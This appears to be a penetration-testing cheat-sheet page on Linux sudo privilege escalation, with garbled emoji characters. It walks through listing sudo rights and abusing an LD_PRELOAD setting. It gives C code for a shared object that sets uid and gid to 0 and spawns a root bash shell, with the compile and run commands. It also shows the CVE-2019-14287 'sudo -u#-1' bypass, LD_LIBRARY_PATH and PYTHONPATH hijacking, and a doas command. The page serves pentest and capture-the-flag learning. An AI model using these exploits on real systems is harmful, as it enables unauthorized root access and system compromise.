sudo privilege escalation
An excellent reference to exploit sudo: SUDO_KILLER (2.1k β). List sudoers with getent group sudo
.
If you have administrative privileges, you can list them with:
$ sudo -nl # without a password
$ sudo -l # with a password
The first section is about settings and environment variables that may be exploited such as LD_PRELOAD.
Matching Defaults entries for [...]:
[...] # something here
The second section is about your sudoers rights. Such commands may be exploited to get root, search the command on GTOBins #sudo.
User [...] may run the following commands on [...]:
(root) /bin/tar
β‘οΈ For instance, the user below can run /bin/tar
as root
.
π Sometimes, instead of root, we may be able to run commands as another user, such as /opt/script.sh
as user xxx
. Use sudo -u xxx
.
π Sometimes, patterns are used in commands/paths. In a path, it means we can use ../
. In a command, we can use any option.
User [...] may run the following commands on [...]:
(root) NOPASSWD: /usr/bin/vim
(ALL) NOPASSWD: /usr/bin/vim
(xxx) NOPASSWD: /opt/*.sh
(root) /usr/bin/ssh *
(ALL : ALL) SETENV: NOPASSWD: /usr/bin/python3
β οΈ If you can only execute the script and not read it, either try to see if the script use an injectable parameter or try to find if the source code is available somewhere else (ex: on Git).
β οΈ A configuration may contains both env_keep
and env_reset
. The option sudo -E
is the same as env_keep
.
LD_PRELOAD
If there is env_keep += LD_PRELOAD
in the permissions displayed by sudo -l
OR if there is no env_reset
, then it means that we can set LD_PRELOAD
and run code before executing the command.
The code below replace the gid/uid of the user running the command with 0
(root). Then, it pops a bash shell (as root!).
//#include <stdio.h>
//#include <sys/types.h>
//#include <stdlib.h>
void _init() {
//unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
Compile it with
$ cd /tmp
$ gcc -shared -fPIC init.c -o init.so
$ gcc -shared -fPIC init.c -o init.so -nostartfiles
Then, call the command that you could run as administrator (tar
here), while setting the variable path to your script:
$ sudo LD_PRELOAD=/tmp/init.so tar
π Congratulations, you are root
now!
Well-known Vulnerabilities
sudo before 1.8.28 (CVE-2019-14287)
If a user was allowed to run one specific command using sudo, such as tar
, then it was possible for any other user to impersonate the authorized user, and run the command as root too.
$ sudo -u#-1 tar [...]
$ sudo -u#4294967295 tar [...]
π Congratulations, you are root
now!
Additional Notes
doas
Doas is a minimal alternative to sudo. The command is so minimal that I was not able to know why I could exploit it while there were no configuration files and I could not use my own (did nothing).
$ doas -u root bash
LD_LIBRARY_PATH
While uncommon, if the sudo configuration include env_keep+=LD_LIBRARY_PATH
, we are able to set a custom folder for .so
. Refer to Shared Object Hijacking.
$ sudo LD_LIBRARY_PATH=/path/to/xx/ [...]
PYTHONPATH
While uncommon, if the sudo configuration include env_keep+=PYTHONPATH
, we are able to set a custom folder for python modules. Refer to Shared Object Hijacking.
$ sudo PYTHONPATH=/path/to/xx/ [...]